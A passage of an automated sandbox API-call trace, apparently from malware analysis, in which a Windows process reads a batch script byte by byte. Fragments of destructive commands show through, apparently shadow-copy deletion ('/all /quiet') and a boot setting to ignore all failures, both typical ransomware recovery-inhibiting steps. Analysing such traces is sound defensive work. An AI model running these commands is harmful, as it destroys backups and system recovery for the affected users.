dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.424] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c52, cchWideChar=1 | out: lpWideCharStr="alete\n /all /quiet\n") returned 1 [0150.425] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.425] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.425] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c54, cchWideChar=1 | out: lpWideCharStr="uete\n /all /quiet\n") returned 1 [0150.425] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.425] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.425] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c56, cchWideChar=1 | out: lpWideCharStr="lte\n /all /quiet\n") returned 1 [0150.425] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.425] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.425] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c58, cchWideChar=1 | out: lpWideCharStr="te\n /all /quiet\n") returned 1 [0150.425] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.425] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.425] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5a, cchWideChar=1 | out: lpWideCharStr="}\n /all /quiet\n") returned 1 [0150.425] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.425] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.425] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5c, cchWideChar=1 | out: lpWideCharStr=" /all /quiet\n") returned 1 [0150.425] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.425] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.425] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5e, cchWideChar=1 | out: lpWideCharStr="b/all /quiet\n") returned 1 [0150.425] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.425] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.426] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c60, cchWideChar=1 | out: lpWideCharStr="oall /quiet\n") returned 1 [0150.426] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.426] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.426] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c62, cchWideChar=1 | out: lpWideCharStr="oll /quiet\n") returned 1 [0150.426] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.426] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.426] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c64, cchWideChar=1 | out: lpWideCharStr="tl /quiet\n") returned 1 [0150.426] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.426] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.426] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c66, cchWideChar=1 | out: lpWideCharStr="s /quiet\n") returned 1 [0150.426] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.426] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.426] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c68, cchWideChar=1 | out: lpWideCharStr="t/quiet\n") returned 1 [0150.426] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.426] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.426] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6a, cchWideChar=1 | out: lpWideCharStr="aquiet\n") returned 1 [0150.426] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.426] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.426] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6c, cchWideChar=1 | out: lpWideCharStr="tuiet\n") returned 1 [0150.426] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.427] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.427] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.427] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6e, cchWideChar=1 | out: lpWideCharStr="uiet\n") returned 1 [0150.427] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.427] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.427] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.427] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c70, cchWideChar=1 | out: lpWideCharStr="set\n") returned 1 [0150.427] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.427] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.427] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.427] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c72, cchWideChar=1 | out: lpWideCharStr="pt\n") returned 1 [0150.427] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.427] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.427] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.427] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c74, cchWideChar=1 | out: lpWideCharStr="o\n") returned 1 [0150.427] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.427] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.427] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.427] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c76, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0150.427] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.427] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.427] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.427] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c78, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0150.427] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.427] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.427] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.428] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0150.428] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.428] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.428] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.428] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0150.428] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.428] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.428] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.428] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0150.428] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.428] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.428] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.428] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c80, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0150.428] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.428] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.428] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.428] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c82, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0150.428] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.428] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.428] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.428] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c84, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0150.428] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.428] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.428] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.428] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c86, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0150.428] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.428] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.428] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c88, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0150.429] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.429] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.429] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c8a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0150.429] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.429] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.429] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c8c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0150.429] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.429] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.429] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c8e, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0150.429] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.429] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.429] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c90, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0150.429] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.429] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.429] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c92, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0150.429] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.429] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.429] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c94, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0150.429] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.430] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.430] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c96, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0150.430] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.430] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.430] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c98, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0150.430] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.430] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.430] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 